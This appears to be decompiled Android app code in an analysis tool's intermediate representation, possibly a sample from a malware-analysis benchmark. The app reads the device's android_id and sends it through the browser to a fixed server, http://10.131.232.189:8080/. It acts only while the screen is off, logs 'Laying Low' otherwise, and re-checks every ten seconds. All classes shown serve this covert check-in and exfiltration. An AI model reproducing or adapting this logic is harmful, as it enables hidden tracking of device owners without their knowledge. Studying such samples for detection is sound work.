record [|com:fgweihlp:wfgnp:HlpRestart|]  @type class @AccessFlag PUBLIC extends  [|java:lang:Runnable|] {
      [|android:content:Context|] [|com:fgweihlp:wfgnp:HlpRestart.c|]    @AccessFlag PRIVATE;
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HlpRestart.<init>|] ([|com:fgweihlp:wfgnp:HlpRestart|] v0 @type (this), [|android:content:Context|] v1 @type (object)) @owner [|com:fgweihlp:wfgnp:HlpRestart|] @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.<init>:(Landroid/content/Context;)V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02b964.   call temp:=  [|java:lang:Object.<init>|](v0) @signature [|Ljava/lang/Object;.<init>:()V|] @classDescriptor [|java:lang:Object|] @type direct;
#L02b96a.   v0.[|com:fgweihlp:wfgnp:HlpRestart.c|]  := v1 @type object;
#L02b96e.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HlpRestart.run|] ([|com:fgweihlp:wfgnp:HlpRestart|] v3 @type (this)) @owner [|com:fgweihlp:wfgnp:HlpRestart|] @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.run:()V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
      
#L02b980.   v0:= v3.[|com:fgweihlp:wfgnp:HlpRestart.c|]   @type object;
#L02b984.   v1:= new [|android:content:Intent|];
#L02b988.   v2:= "com.fgweihlp.wfgnp.Watcher.RUN" @type (object, string);
#L02b98c.   call temp:=  [|android:content:Intent.<init>|](v1, v2) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02b992.   call temp:=  [|android:content:Context.sendBroadcast|](v0, v1) @signature [|Landroid/content/Context;.sendBroadcast:(Landroid/content/Intent;)V|] @classDescriptor [|android:content:Context|] @type virtual;
#L02b998.   return @void ;

   }
record [|com:fgweihlp:wfgnp:HookActivity|]  @type class @AccessFlag PUBLIC  extends [|android:app:Activity|] {
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.home|]    @AccessFlag PUBLIC_FINAL;
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.id|]    @AccessFlag PRIVATE;
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.shelloutput|]    @AccessFlag PUBLIC;
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.<init>|] ([|com:fgweihlp:wfgnp:HookActivity|] v1 @type (this)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
        v0;
      
#L02b9ac.   call temp:=  [|android:app:Activity.<init>|](v1) @signature [|Landroid/app/Activity;.<init>:()V|] @classDescriptor [|android:app:Activity|] @type direct;
#L02b9b2.   v0:= "http://10.131.232.189:8080/" @type (object, string);
#L02b9b6.   v1.[|com:fgweihlp:wfgnp:HookActivity.home|]  := v0 @type object;
#L02b9ba.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.onCreate|] ([|com:fgweihlp:wfgnp:HookActivity|] v4 @type (this), [|android:os:Bundle|] v5 @type (object)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.onCreate:(Landroid/os/Bundle;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
      
#L02b9cc.   call temp:=  [|android:app:Activity.onCreate|](v4, v5) @signature [|Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V|] @classDescriptor [|android:app:Activity|] @type super;
#L02b9d2.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.getContentResolver|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.getContentResolver:()Landroid/content/ContentResolver;|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02b9d8.   v1:= temp  @type object;
#L02b9da.   v2:= "android_id" @type (object, string);
#L02b9de.   call temp:=  [|android:provider:Settings$Secure.getString|](v1, v2) @signature [|Landroid/provider/Settings$Secure;.getString:(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;|] @classDescriptor [|android:provider:Settings$Secure|] @type static;
#L02b9e4.   v1:= temp  @type object;
#L02b9e6.   v4.[|com:fgweihlp:wfgnp:HookActivity.id|]  := v1 @type object;
#L02b9ea.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.getIntent|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.getIntent:()Landroid/content/Intent;|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02b9f0.   v1:= temp  @type object;
#L02b9f2.   call temp:=  [|android:content:Intent.getData|](v1) @signature [|Landroid/content/Intent;.getData:()Landroid/net/Uri;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02b9f8.   v1:= temp  @type object;
#L02b9fa.   call temp:=  [|android:net:Uri.getPath|](v1) @signature [|Landroid/net/Uri;.getPath:()Ljava/lang/String;|] @classDescriptor [|android:net:Uri|] @type virtual;
#L02ba00.   v0:= temp  @type object;
#L02ba02.   v1:= "wfg" @type (object, string);
#L02ba06.   v2:= new [|java:lang:StringBuilder|];
#L02ba0a.   v3:= "Action: " @type (object, string);
#L02ba0e.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02ba14.   call temp:=  [|java:lang:StringBuilder.append|](v2, v0) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba1a.   v2:= temp  @type object;
#L02ba1c.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba22.   v2:= temp  @type object;
#L02ba24.   call temp:=  [|android:util:Log.d|](v1, v2) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02ba2a.   if v0 == 0 then goto L02ba8e;
#L02ba2e.   v1:= "Hook" @type (object, string);
#L02ba32.   v2:= new [|java:lang:StringBuilder|];
#L02ba36.   v3:= "Action: " @type (object, string);
#L02ba3a.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02ba40.   call temp:=  [|java:lang:StringBuilder.append|](v2, v0) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba46.   v2:= temp  @type object;
#L02ba48.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba4e.   v2:= temp  @type object;
#L02ba50.   call temp:=  [|android:util:Log.i|](v1, v2) @signature [|Landroid/util/Log;.i:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02ba56.   v1:= "/checkin" @type (object, string);
#L02ba5a.   call temp:=  [|java:lang:String.equals|](v0, v1) @signature [|Ljava/lang/String;.equals:(Ljava/lang/Object;)Z|] @classDescriptor [|java:lang:String|] @type virtual;
#L02ba60.   v1:= temp;
#L02ba62.   if v1 == 0 then goto L02ba8e;
#L02ba66.   v1:= new [|java:lang:StringBuilder|];
#L02ba6a.   v2:= "id=" @type (object, string);
#L02ba6e.   call temp:=  [|java:lang:StringBuilder.<init>|](v1, v2) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02ba74.   v2:= v4.[|com:fgweihlp:wfgnp:HookActivity.id|]   @type object;
#L02ba78.   call temp:=  [|java:lang:StringBuilder.append|](v1, v2) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba7e.   v1:= temp  @type object;
#L02ba80.   call temp:=  [|java:lang:StringBuilder.toString|](v1) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba86.   v1:= temp  @type object;
#L02ba88.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.sendByBrowser|](v4, v1) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.sendByBrowser:(Ljava/lang/String;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02ba8e.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.finish|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.finish:()V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02ba94.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.sendByBrowser|] ([|com:fgweihlp:wfgnp:HookActivity|] v4 @type (this), [|java:lang:String|] v5 @type (object)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.sendByBrowser:(Ljava/lang/String;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
      
#L02baa8.   v0:= new [|android:content:Intent|];
#L02baac.   v2:= "android.intent.action.VIEW" @type (object, string);
#L02bab0.   call temp:=  [|android:content:Intent.<init>|](v0, v2) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bab6.   v2:= new [|java:lang:StringBuilder|];
#L02baba.   v3:= "http://10.131.232.189:8080/?" @type (object, string);
#L02babe.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02bac4.   call temp:=  [|java:lang:StringBuilder.append|](v2, v5) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02baca.   v2:= temp  @type object;
#L02bacc.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02bad2.   v2:= temp  @type object;
#L02bad4.   call temp:=  [|android:net:Uri.parse|](v2) @signature [|Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;|] @classDescriptor [|android:net:Uri|] @type static;
#L02bada.   v1:= temp  @type object;
#L02badc.   v2:= "text/html" @type (object, string);
#L02bae0.   call temp:=  [|android:content:Intent.setDataAndType|](v0, v1, v2) @signature [|Landroid/content/Intent;.setDataAndType:(Landroid/net/Uri;Ljava/lang/String;)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bae6.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.startActivity|](v4, v0) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.startActivity:(Landroid/content/Intent;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02baec.   return @void ;

   }
record [|com:fgweihlp:wfgnp:MainActivity|]  @type class @AccessFlag PUBLIC  extends [|android:app:Activity|] {
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:MainActivity.<init>|] ([|com:fgweihlp:wfgnp:MainActivity|] v0 @type (this)) @owner [|com:fgweihlp:wfgnp:MainActivity|] @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02bb00.   call temp:=  [|android:app:Activity.<init>|](v0) @signature [|Landroid/app/Activity;.<init>:()V|] @classDescriptor [|android:app:Activity|] @type direct;
#L02bb06.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:MainActivity.onCreate|] ([|com:fgweihlp:wfgnp:MainActivity|] v2 @type (this), [|android:os:Bundle|] v3 @type (object)) @owner [|com:fgweihlp:wfgnp:MainActivity|] @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.onCreate:(Landroid/os/Bundle;)V|] @Access PROTECTED {
      local temp ;
        v0;
        v1;
      
#L02bb18.   call temp:=  [|android:app:Activity.onCreate|](v2, v3) @signature [|Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V|] @classDescriptor [|android:app:Activity|] @type super;
#L02bb1e.   v0:= new [|android:content:Intent|];
#L02bb22.   v1:= "com.fgweihlp.wfgnp.Watcher.RUN" @type (object, string);
#L02bb26.   call temp:=  [|android:content:Intent.<init>|](v0, v1) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bb2c.   call temp:=  [|com:fgweihlp:wfgnp:MainActivity.sendBroadcast|](v2, v0) @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.sendBroadcast:(Landroid/content/Intent;)V|] @classDescriptor [|com:fgweihlp:wfgnp:MainActivity|] @type virtual;
#L02bb32.   v0:= "MainActivity" @type (object, string);
#L02bb36.   v1:= "sent an intent" @type (object, string);
#L02bb3a.   call temp:=  [|android:util:Log.d|](v0, v1) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bb40.   return @void ;

   }

record [|com:fgweihlp:wfgnp:Watcher|]  @type class @AccessFlag PUBLIC  extends [|android:content:BroadcastReceiver|] {
   }
      global [|java:lang:String|] @@[|com:fgweihlp:wfgnp:Watcher.RUN|]    @AccessFlag PUBLIC_STATIC_FINAL;
    procedure [|void|] [|com:fgweihlp:wfgnp:Watcher.<init>|] ([|com:fgweihlp:wfgnp:Watcher|] v0 @type (this)) @owner [|com:fgweihlp:wfgnp:Watcher|] @signature [|Lcom/fgweihlp/wfgnp/Watcher;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02bc14.   call temp:=  [|android:content:BroadcastReceiver.<init>|](v0) @signature [|Landroid/content/BroadcastReceiver;.<init>:()V|] @classDescriptor [|android:content:BroadcastReceiver|] @type direct;
#L02bc1a.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:Watcher.onReceive|] ([|com:fgweihlp:wfgnp:Watcher|] v7 @type (this), [|android:content:Context|] v8 @type (object), [|android:content:Intent|] v9 @type (object)) @owner [|com:fgweihlp:wfgnp:Watcher|] @signature [|Lcom/fgweihlp/wfgnp/Watcher;.onReceive:(Landroid/content/Context;Landroid/content/Intent;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
        v4;
        v5;
        v6;
      
#L02bc2c.   v4:= "Checkin" @type (object, string);
#L02bc30.   v5:= "Running" @type (object, string);
#L02bc34.   call temp:=  [|android:util:Log.d|](v4, v5) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bc3a.   v4:= "power" @type (object, string);
#L02bc3e.   call temp:=  [|android:content:Context.getSystemService|](v8, v4) @signature [|Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;|] @classDescriptor [|android:content:Context|] @type virtual;
#L02bc44.   v2:= temp  @type object;
#L02bc46.   v2:= ([|android:os:PowerManager|])v2;
#L02bc4a.   call temp:=  [|android:os:PowerManager.isScreenOn|](v2) @signature [|Landroid/os/PowerManager;.isScreenOn:()Z|] @classDescriptor [|android:os:PowerManager|] @type virtual;
#L02bc50.   v4:= temp;
#L02bc52.   if v4 != 0 then goto L02bcc0;
#L02bc56.   v4:= "Checkin" @type (object, string);
#L02bc5a.   v5:= "Activating" @type (object, string);
#L02bc5e.   call temp:=  [|android:util:Log.d|](v4, v5) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bc64.   v1:= new [|android:content:Intent|];
#L02bc68.   v4:= "android.intent.action.VIEW" @type (object, string);
#L02bc6c.   call temp:=  [|android:content:Intent.<init>|](v1, v4) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bc72.   v4:= "android.intent.category.BROWSABLE" @type (object, string);
#L02bc76.   call temp:=  [|android:content:Intent.addCategory|](v1, v4) @signature [|Landroid/content/Intent;.addCategory:(Ljava/lang/String;)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bc7c.   v4:= "watcher's intent categories = " @type (object, string);
#L02bc80.   call temp:=  [|android:content:Intent.getCategories|](v1) @signature [|Landroid/content/Intent;.getCategories:()Ljava/util/Set;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bc86.   v5:= temp  @type object;
#L02bc88.   call temp:=  [|java:lang:Object.toString|](v5) @signature [|Ljava/lang/Object;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:Object|] @type virtual;
#L02bc8e.   v5:= temp  @type object;
#L02bc90.   call temp:=  [|android:util:Log.d|](v4, v5) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bc96.   v4:= "wfgnp://data/checkin" @type (object, string);
#L02bc9a.   call temp:=  [|android:net:Uri.parse|](v4) @signature [|Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;|] @classDescriptor [|android:net:Uri|] @type static;
#L02bca0.   v3:= temp  @type object;
#L02bca2.   v4:= "text/html" @type (object, string);
#L02bca6.   call temp:=  [|android:content:Intent.setDataAndType|](v1, v3, v4) @signature [|Landroid/content/Intent;.setDataAndType:(Landroid/net/Uri;Ljava/lang/String;)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bcac.   v4:= 268435456  @length high16;
#L02bcb0.   call temp:=  [|android:content:Intent.setFlags|](v1, v4) @signature [|Landroid/content/Intent;.setFlags:(I)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bcb6.   v4:= temp  @type object;
#L02bcb8.   call temp:=  [|android:content:Context.startActivity|](v8, v4) @signature [|Landroid/content/Context;.startActivity:(Landroid/content/Intent;)V|] @classDescriptor [|android:content:Context|] @type virtual;
#L02bcbe.   return @void ;
#L02bcc0.   v4:= "Checkin" @type (object, string);
#L02bcc4.   v5:= "Laying Low" @type (object, string);
#L02bcc8.   call temp:=  [|android:util:Log.d|](v4, v5) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bcce.   v0:= new [|android:os:Handler|];
#L02bcd2.   call temp:=  [|android:os:Handler.<init>|](v0) @signature [|Landroid/os/Handler;.<init>:()V|] @classDescriptor [|android:os:Handler|] @type direct;
#L02bcd8.   v4:= new [|com:fgweihlp:wfgnp:HlpRestart|];
#L02bcdc.   call temp:=  [|com:fgweihlp:wfgnp:HlpRestart.<init>|](v4, v8) @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.<init>:(Landroid/content/Context;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HlpRestart|] @type direct;
#L02bce2.   v5:= 10000  @length wide16;
#L02bce6.   call temp:=  [|android:os:Handler.postDelayed|](v0, v4, v5, v6) @signature [|Landroid/os/Handler;.postDelayed:(Ljava/lang/Runnable;J)Z|] @classDescriptor [|android:os:Handler|] @type virtual;
#L02bcec.   goto L02bcbe;

   }
